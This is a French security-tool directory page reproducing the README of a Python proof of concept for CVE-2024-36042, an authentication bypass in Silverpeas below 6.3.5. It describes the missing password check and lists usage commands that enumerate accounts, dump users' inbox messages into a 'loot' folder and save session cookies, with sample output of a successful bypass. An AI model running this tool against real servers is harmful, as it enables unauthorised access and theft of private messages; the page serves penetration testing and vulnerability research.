Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — PoC Python pour le contournement de l'authentification CVE-2024-36042 dans Silverpeas < 6.3.5. Dispose de la détection de version, de l'énumération d'utilisateurs multithread, de l'extraction de messages et de rapports structurés pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Authentification et AutorisationReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

PoC Python pour le contournement de l'authentification CVE-2024-36042 dans Silverpeas < 6.3.5. Dispose de la détection de version, de l'énumération d'utilisateurs multithread, de l'extraction de messages et de rapports structurés pour les tests de sécurité autorisés.

Voir le dépôt
il y a 3 moisPas encore vérifié

Silverpeas-AuthBypass-CVE-2024-36042

Un proof-of-concept Python3 propre et de qualité professionnelle pour CVE-2024-36042 — un contournement d'authentification dans Silverpeas < 6.3.5 causé par l'absence de validation du mot de passe dans AuthenticationServlet.

Python 3.8+ License: MIT


Aperçu

AuthenticationServlet de Silverpeas accepte une requête de connexion même lorsque le paramètre Password est omis du corps POST, accordant un accès de session authentifié à tout nom d'utilisateur connu. Cet outil démontre la vulnérabilité de manière responsable via un framework d'exploitation modulaire et multi-threadé, doté de fonctions avancées de reconnaissance, d'extraction de données et de génération de rapports professionnels.

Version affectée : Silverpeas < 6.3.5
CVE : CVE-2024-36042
GHSA : GHSA-qvh3-8c57-gp4m


Fonctionnalités


Installation

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

Utilisation

Test rapide (liste d'utilisateurs intégrée)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

Rapport avancé (Markdown + Console)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

Export forensique (fichiers individuels par message)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

Vérification de version uniquement (sans exploitation)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

Via un proxy avec journalisation du HTML brut

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

Gestion des sorties

L'outil prend en charge quatre modes de sortie principaux pour les messages extraits via --message-output :

  1. console (défaut) : Affiche les messages nettoyés directement dans le terminal avec mise en évidence des mots-clés.
  2. markdown : Génère un rapport {username}_messages.md par compte dans le répertoire de sortie.
  3. files : Crée un dossier par compte et enregistre chaque message dans un fichier individuel (ex. message_0006.md) avec des identifiants complétés par des zéros pour un tri propre du système de fichiers.
  4. both : Combine les modes console et markdown.

Structure des artefacts

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optionnel : --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

Référence CLI

root@kitploit:~
-t, --target        URL de base de Silverpeas (obligatoire)
-u, --user          Nom d'utilisateur unique à cibler
--userlist          Fichier contenant un nom d'utilisateur par ligne
--dump-messages     Extraire et afficher les messages de la boîte de réception
--max-id            ID de message maximal à vérifier (défaut : 50)
--threads           Workers concurrents (défaut : 5)
--proxy             URL du proxy HTTP
--message-output    Mode de sortie : {console, markdown, files, both}
--output-format     Format de fichier : {md, txt}
--json              Exporter un rapport JSON complet
--csv               Exporter un CSV des messages extraits
--outdir            Répertoire de sortie pour les exports
--no-color          Désactiver la sortie couleur ANSI (utile pour les journaux)
--save-raw-html     Sauvegarder les réponses HTML d'origine pour le débogage
--check-version     Identifier la version uniquement
--no-exploit        Ignorer l'exploitation (à associer avec --check-version)
--quiet, -q         Sortie minimale
--no-banner         Masquer la bannière

Exemple de sortie

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnérable.

[*] Essai : scr1ptkiddy
[+] CONTOURNÉ -> scr1ptkiddy
[+] Données sauvegardées dans ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Résumé d'exécution
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Compte        │ Statut   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCÈS   │ 6        │
│ admin         │ ÉCHEC    │ 0        │
└───────────────┴──────────┴──────────┘

[+] Rapport JSON -> ./report_20260516_013210.json

Pourquoi cet outil existe

Ce dépôt fait partie de mon portfolio en sécurité offensive. Il démontre :

  • La traduction de recherche de vulnérabilités — convertir une CVE divulguée en un exploit fonctionnel et fiable.
  • Un outillage de haute qualité — gestion robuste des erreurs, prise en charge multilingue et gestion structurée des sorties.
  • Une conscience opérationnelle — multi-threading, support proxy et logique de déduplication pour des environnements réalistes.
  • Une ingénierie professionnelle — architecture de code propre, documentation complète et accent mis sur l'expérience de l'opérateur (UX).

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés, de recherche et d'éducation. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation explicite avant de tester toute infrastructure qui ne vous appartient pas.


Licence

MIT

Télécharger l’outil
FonctionnalitéDescription
Détection de versionIdentification de la version de Silverpeas et de son statut de vulnérabilité avant exploitation.
Multi-threadéÉnumération d'utilisateurs concurrente via ThreadPoolExecutor avec sortie thread-safe.
Découverte avancéeDécouverte d'endpoints multilingue (anglais/français) avec sondage multi-ID.
Extraction de donnéesDump de messages haute fidélité avec déduplication et filtrage des contenus génériques.
Sortie flexiblePrise en charge de la console, des rapports Markdown et des exports de fichiers individuels (.md ou .txt).
Proxy et débogageRoutage via Burp/ZAP (--proxy) et sauvegarde du HTML brut pour le débogage du parseur.
UX soignéeTableaux récapitulatifs ASCII, mise en évidence des mots-clés et contrôle optionnel des couleurs ANSI.